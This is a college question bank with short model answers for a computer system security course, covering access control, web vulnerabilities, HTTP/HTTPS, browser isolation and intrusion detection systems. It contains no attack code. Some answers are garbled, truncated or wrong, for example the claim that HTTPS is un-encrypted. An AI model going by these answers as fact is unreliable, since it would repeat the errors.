Mangalmay Institute of Engineering & Technology, Gr.

Noida
Question Bank
Unit No: 2 and 3 unit Course Name & Code: Computer System Security (KNC-301)
Faculty Name: Shweta Chauhan

1. What is access control mechanism? Explain its types. (2019, 2020, 2021)

Access control is a security technique that regulates who or what can view or use
resources in a computing environment. It is a fundamental concept in security that
minimizes risk to the business or organization.

There are two types of access control: physical and logical. Physical access control
limits access to campuses, buildings, rooms and physical IT assets. Logical access
control limits connections to computer networks, system files and data.

To secure a facility, organizations use electronic access control systems that rely
on user credentials, access card readers, auditing and reports to track employee
access to restricted business locations and proprietary areas, such as data centers.
Some of these systems incorporate access control panels to restrict entry to rooms
and buildings as well as alarms and lockdown capabilities to prevent unauthorized
access or operations.

2. What are web security and its goals? (2020, 2021)

Web security is also known as “Cyber security”. It basically means protecting a

website or web application by detecting, preventing and responding to cyber
threats.

Websites and web applications are just as prone to security breaches as physical
homes, stores, and government locations. Unfortunately, cybercrime happens every
day, and great web security measures are needed to protect websites and web
applications from becoming compromised.

That’s exactly what web security does – it is a system of protection measures and
protocols that can protect your website or web application from being hacked or
entered by unauthorized personnel. This integral division of Information Security
is vital to the protection of websites, web applications, and web services. Anything
that is applied over the Internet should have some form of web security to protect
it.

3.Explain threat modeling.(2020,2021)

With the advancement in technology it becomes easier day by day for the hacker to
gain access to sensitive data, disable applications etc. Thus, Application Security
has become a major concern. One method used to implement application security
in design process is through THREAT MODELLING.

Threats can be anything that can take advantage of a vulnerability to breach

security and negatively alter, erase, harm object or objects of interest. Threat
Modelling can be done at any stage of development but if done at the beginning it
will help in early determination of threats that can be dealt properly.

The purpose of Threat modelling is to identify, communicate, and understand

threats and mitigation to the organization’s stakeholder’s as early as possible.
Documentation from this process provide system analyst and defenders with a
complete analysis of probable attackers profile, the most likely attack vectors, and
the assets most desired by the attacker.

4.Write short note on http and https?(2018,2019,2020,2021)

HTTP stands for Hypertext Transfer Protocol. When you enter http:// in your
address bar in front of the domain, it tells the browser to connect over HTTP.
HTTP uses TCP (Transmission Control Protocol), generally over port 80, to send
and receive data packets over the web. To put it simply it is a protocol that’s used
by a client and server which allows you to communicate with other websites. The
client sends a request message to an HTTP server (after the TCP handshake) which
hosts a website, the server then replies with the response message. The response
message contains completion status information

HTTPS stands for Hypertext Transfer Protocol Secure . When you

enter https:// in your address bar in front of the domain, it tells the browser to
connect over HTTPS. Generally sites running over HTTPS will have a redirect in
place so even if you type in http:// it will redirect to deliver over a secured
connection. HTTPS also uses TCP (Transmission Control Protocol) to send and
receive data packets, but it does so over port 443, within a connection encrypted by
Transport Layer Security (TLS).

5.What are cookies?(2019)

Cookies are small files which are stored on a user's computer. They are designed to
hold a modest amount of data specific to a particular client and website, and can be
accessed either by the web server or the client computer. This allows the server to
deliver a page tailored to a particular user, or the page itself can contain some
script which is aware of the data in the cookie and so is able to carry information
from one visit to the website (or related site) to the next.
6.What are frames?(2020)
A frame is a unit of data. A frame works to help identify data packets used in
networking and telecommunications structures. Frames also help to determine how
data receivers interpret a stream of data from a source.
7.Explain the security development of website?(2019,2020,2021)
The Internet is a dangerous place! With great regularity, we hear about websites
becoming unavailable due to denial of service attacks, or displaying modified (and
often damaging) information on their homepages. In other high-profile cases,
millions of passwords, email addresses, and credit card details have been leaked
into the public domain, exposing website users to both personal embarrassment
and financial risk.
8.Explain the type of vulnerabilities related to web?(2020,2021)
. SQL INJECTIONS
SQL injection is a type of web application security vulnerability in which an attacker
attempts to use application code to access or corrupt database content. If successful,
this allows the attacker to create, read, update, alter, or delete data.

CROSS SITE SCRIPTING (XSS)

Cross-site scripting (XSS) targets an application's users by injecting code, usually a

client-side script such as JavaScript, into a web application's output. The concept
of XSS is to manipulate client-side scripts of a web application to execute in the
manner desired by the attacker. XSS allows attackers to execute scripts in the
victim's browser which can hijack user sessions, deface websites or redirect the
user to malicious sites.

2. BROKEN AUTHENTICATION & SESSION MANAGEMENT

Broken authentication and session management encompass several security issues,

all of them having to do with maintaining the identity of a user. If authentication
credentials and session identifiers are not protected at all times, an attacker can
hijack an active session and assume the identity of a user.

3. INSECURE DIRECT OBJECT REFERENCES

Insecure direct object reference is when a web application exposes a reference to
an internal implementation object. Internal implementation objects include files,
database records, directories and database keys. When an application exposes a
reference to one of these objects in a URL, hackers can manipulate it to gain access
to a user's personal data.

4. SECURITY MISCONFIGURATION
 Security misconfiguration encompasses several types of vulnerabilities all centered
on a lack of maintenance or a lack of attention to the web application
configuration. A secure configuration must be defined and deployed for the
application, frameworks, application server, web server, database server and
platform. Security misconfiguration gives hackers access to private data or features
and can result in a complete system compromise.

5. CROSS-SITE REQUEST FORGERY (CSRF)

Cross-Site Request Forgery (CSRF) is a malicious attack where a user is tricked into
performing an action he or she didn't intend to do. A third-party website will send a
request to a web application that a user is already authenticated against (e.g. their bank).
The attacker can then access functionality via the victim's already authenticated browser.
Targets include web applications like social media, in browser email clients, online
banking,

9. What are the characteristics and features of UNIX? (2020,2021)

Features of UNIX:
1. Portable: UNIX can be installed on many hardware platforms.
2. Multi user: The UNIX user allows multiple users concurrently share aria.
3. Multi-tasking: UNIX allows a user to run more than one programme at time.
4. Organized file system: UNIX has organized file and directory system those
alon users to organize and maintain files.
5. Device independence: UNIX treats input output devices as ordinary files. The
Derination of file input and output is easily controlled through UNIX design
lease
Called redirection.
Utilities: UNIX provides a rich library of utilities that can increase.
10.Explain browser isolation in detail?(2019,2020,2021)

Browser isolation is cyber-security models for web browsing that can be used p
physically separate an internet user's browsing activity from their local machine.
network and infrastructure.
2. With this model, individual browser sessions are abstracted away from hardware
and direct internet access, trapping harmful activity inside the disposable
environment.
3. Browser isolation may also be referred to as remote browser isolation, web
isolation or remote browsing.
4. A major weakness in popular security tools is protection from web or browser-
based attacks, malware and ransomware.
5. By separating browsing activity from endpoint hardware, the device's attack
surface is reduced, sensitive data is protected and malware or other known and
unknown security threats are minimised.
6. This is an evolution of the cyber security concepts of security through physical
isolation and air-gapping.
Working of Browser isolation:
• Browser isolation works by providing users with a disposable, non-persisten
environment for browsing.
11.What are the different types of Access Control?(2019,2020,2021)

The main models of access control are the following:

Mandatory access control (MAC). This is a security model in which access rights

are regulated by a central authority based on multiple levels of security. Often used
in government and military environments, classifications are assigned to system
resources and the operating system or security kernel. MAC grants or denies access
to resource objects based on the information security clearance of the user or device.
For example, Security-Enhanced Linux is an implementation of MAC on Linux.
Discretionary access control (DAC). This is an access control method in which
owners or administrators of the protected system, data or resource set the policies
defining who or what is authorized to access the resource. Many of these systems
enable administrators to limit the propagation of access rights. A common criticism
of DAC systems is a lack of centralized control.

Role-based access control (RBAC). This is a widely used access control

mechanism that restricts access to computer resources based on individuals or groups
with defined business functions -- e.g., executive level, engineer level 1, etc. -- rather
than the identities of individual users. The role-based security model relies on a
complex structure of role assignments, role authorizations and role permissions
developed using role engineering to regulate employee access to
systems. RBAC systems can be used to enforce MAC and DAC frameworks.

Rule-based access control. This is a security model in which the system

administrator defines the rules that govern access to resource objects. These rules are
often based on conditions, such as time of day or location. It is not uncommon to use
some form of both rule-based access control and RBAC to enforce access policies
and procedures.

Attribute-based access control. This is a methodology that manages access rights

by evaluating a set of rules, policies and relationships using the attributes of users,
systems and environmental conditions.

12.What do you understand by security policies

A security policy is a written document in an organization outlining how to protect
the organization from threats, including computer security threats, and how to
handle situations when they do occur. A security policy must identify all of a
company's assets as well as all the potential threats to those assets.
Data security is commonly referred to as the confidentiality, availability and
integrity of data.More so, companies must ensure data privacy because the
information is an asset to the company. A data security policy is simply the means
to the desired end, which is data privacy.

13.What is root kit attack?

A root kit is a collection of computer software, typically malicious, designed to
enable access to a computer or an area of its software that is not otherwise allowed
(for example, to an unauthorized user) and often masks its existence or the
existence of other software.

14.What is virtual baseisolation?

The popularity and widespread adoption of cloud computing has resulted in
extensified and intensive use of virtualization technology. Virtualization technology
allows the sharing of the same physical resources among several users. This enables
the consolidation of servers and a multitude of user machines into a very small set
of physical servers, by replacing the physical machines with virtual machines,
running on the same physical servers. Consequently, several users work on and
store their data in the same physical platform. A software layer is used to enable
the sharing of hardware between the different users. Understandably, this leads to
apprehensions about the security of their data and working environment for the
users, as these are situated only one software layer apart from those belonging to
the other users.

15.Explain IDS?
An Intrusion Detection System (IDS) is a system that monitors network traffic
for suspicious activity and issues alerts when such activity is discovered. It is a
software application that scans a network or a system for harmful activity or policy
breaching. Any malicious venture or violation is normally reported either to an
administrator or collected centrally using a security information and event
management (SIEM) system. A SIEM system integrates outputs from multiple
sources and uses alarm filtering techniques to differentiate malicious activity from
false alarms.
16. Discuss types of Intrusion Detection system? Classification of Intrusion
Detection System:

IDS are classified into 5 types:

Network Intrusion Detection System (NIDS):

Network intrusion detection systems (NIDS) are set up at a planned point within
the network to examine traffic from all devices on the network. It performs an
observation of passing traffic on the entire subnet and matches the traffic that is
passed on the subnets to the collection of known attacks. Once an attack is
identified or abnormal behavior is observed, the alert can be sent to the
administrator. An example of an NIDS is installing it on the subnet where firewalls
are located in order to see if someone is trying crack the firewall.
Host Intrusion Detection System (HIDS):

Host intrusion detection systems (HIDS) run on independent hosts or devices on the
network. A HIDS monitors the incoming and outgoing packets from the device only
and will alert the administrator if suspicious or malicious activity is detected. It
takes a snapshot of existing system files and compares it with the previous
snapshot. If the analytical system files were edited or deleted, an alert is sent to the
administrator to investigate. An example of HIDS usage can be seen on mission
critical machines, which are not expected to change their layout.
Protocol-based Intrusion Detection System (PIDS):

Protocol-based intrusion detection system (PIDS) comprises of a system or agent that

would consistently resides at the front end of a server, controlling and interpreting
the protocol between a user/device and the server. It is trying to secure the web
server by regularly monitoring the HTTPS protocol stream and accept the related
HTTP protocol. As HTTPS is un-encrypted and before instantly entering its web
presentation layer then this system would need to reside in this interface, between to
use the HTTPS.

Application Protocol-based Intrusion Detection System (APIDS):

Application Protocol-based Intrusion Detection System (APIDS) is a system or
agent that generally resides within a group of servers. It identifies the intrusions by
monitoring and interpreting the communication on application specific protocols.
For example, this would monitor the SQL protocol explicit to the middleware as it
transacts with the database in the web server.
Hybrid Intrusion Detection System :

Hybrid intrusion detection system is made by the combination of two or more

approaches of the intrusion detection system. In the hybrid intrusion detection
system, host agent or system data is combined with network information to
develop a complete view of the network system. Hybrid intrusion detection system
is more effective in comparison to the other intrusion detection system. Prelude is
an example of Hybrid IDS.
17.What is Fault Isolation?
Fault isolation is the practice of designing systems such that when "something
bad" happens, the negative consequences are limited in scope. The typical
method of fault isolation is to create boundaries between system components,
and ensure that the effects of faults don't cross the boundaries or that they are
limited.
18.What is privilege?
In computing, privilege is defined as the delegation of authority to perform
security-relevant functions on a computer system Users who have been
delegated extra levels of control are
called privileged. Users who lack most privileges are defined as unprivileged,
regular, or normal users.
19.Explain user id in term of privilege? Every process has a
real user ID (the UID), an effective user ID (the EUID), a real
user group ID (the GID), and an effective user group ID (the
EGID). ...
20.What is web Security?
Web security threats are vulnerabilities within websites and applications, or attacks
launched by malicious actors. Web security threats are designed to breach an
organizations security defenses, enabling hackers and cyber criminals to control
systems, access data and steal valuable resources. Common web security threats
include malware, ransom ware, cross-site scripting (XSS), SQL injection, phishing,
denial of service and many others.
What is the relationship between web security and email security?
Attackers frequently use both email and the web to successfully breach security
defenses. In fact, email and the web are attack delivery and management systems
used in 99% of successful malware attacks. Because attackers effectively use these
two vectors in combination, it makes sense for organizations to approach web and
email security with an integrated solution that can simplify protection of both of
these business-critical information systems.
2